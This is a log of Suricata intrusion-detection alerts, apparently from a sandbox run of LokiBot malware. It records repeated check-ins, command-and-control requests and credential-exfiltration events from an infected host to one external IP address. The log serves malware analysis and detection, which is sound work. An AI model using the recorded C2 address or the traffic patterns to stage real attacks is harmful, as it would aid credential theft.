                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49729 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49704 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49723 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49729 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49723 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49704 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49730 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49704 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51263 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49717 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51253 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51240 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51253 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51240 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49730 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49730 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51256 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49717 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49717 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51256 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49727 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51256 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51263 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49727 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49729 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49729 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51263 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51256 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51256 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51263 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.8:49704 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51237 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51237 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51237 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51237 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49726 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49705 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49735 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49726 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49705 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51237 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49714 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49714 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49714 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49707 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49714 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49714 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49724 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49720 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49724 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49741 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49739 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51234 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49705 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51234 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49741 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49709 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49720 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49709 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49740 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49740 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49739 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49739 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49741 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49720 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.8:49705 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49708 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49708 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49708 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49711 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49711 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49711 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49708 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49708 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49735 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49749 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49739 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49749 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49734 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49734 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49741 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49741 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51234 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49737 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49711 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49711 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51234 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51234 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49749 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49720 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49737 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49720 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49737 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49739 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49749 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49749 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49737 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49737 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49707 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49707 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49733 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51327 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51327 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51327 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49743 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49743 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49743 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49743 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49743 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49731 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49747 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49747 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49747 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51327 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51327 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51303 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49747 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51303 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49747 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51303 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49712 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49712 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49712 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49712 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49712 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49733 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51231 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49733 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51231 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51231 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49707 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51246 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51231 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51231 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49707 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49716 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49706 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49706 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49716 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49716 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51360 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49716 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51360 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51303 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49706 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51303 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51360 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49706 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49716 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51360 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51360 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49731 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49731 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49725 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49725 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49725 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51246 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49746 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49746 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51246 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49746 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49746 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49746 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49733 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49733 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51241 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51241 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51239 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51241 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51239 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51239 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51246 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51239 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51239 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51241 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51241 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51380 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51380 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51380 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49736 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49736 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49736 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51380 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51380 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49736 -> 94.156.177.41:80
